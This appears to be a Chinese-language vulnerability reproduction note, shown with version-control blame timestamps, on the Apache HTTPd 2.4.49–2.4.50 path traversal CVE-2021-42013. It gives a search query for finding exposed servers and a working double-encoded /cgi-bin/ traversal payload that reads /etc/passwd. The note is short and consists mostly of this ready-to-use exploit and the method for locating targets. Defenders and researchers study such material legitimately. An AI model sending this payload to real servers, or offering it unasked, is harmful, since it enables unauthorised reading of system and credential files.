2022-05-25 16:51:48 +08:00
|
|
|
|
# Apache HTTPd 路径穿越漏洞 CVE-2021-42013
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞描述
|
|
|
|
|
|
|
|
|
|
|
|
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.49~2.4.50-本中存在一个漏洞,可读取服务器中的任意文件 (CVE-2021-41773 的漏洞绕过)
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞影响
|
|
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
|
Apache HTTPd 2.4.49~2.4.50版本
|
|
|
|
|
|
```
|
|
|
|
|
|
|
2023-08-28 15:55:36 +08:00
|
|
|
|
## 网络测绘
|
2022-05-25 16:51:48 +08:00
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
|
server="Apache/2.4.49"
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞复现
|
|
|
|
|
|
|
|
|
|
|
|
Chorme插件Wappalyzer获取 Apache版本
|
|
|
|
|
|
|
2022-12-05 11:09:28 +08:00
|
|
|
|
|
2022-05-25 16:51:48 +08:00
|
|
|
|
|
|
|
|
|
|
验证POC
|
|
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
|
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
|
|
|
|
|
|
```
|
|
|
|
|
|
|
2022-12-05 11:09:28 +08:00
|
|
|
|
|
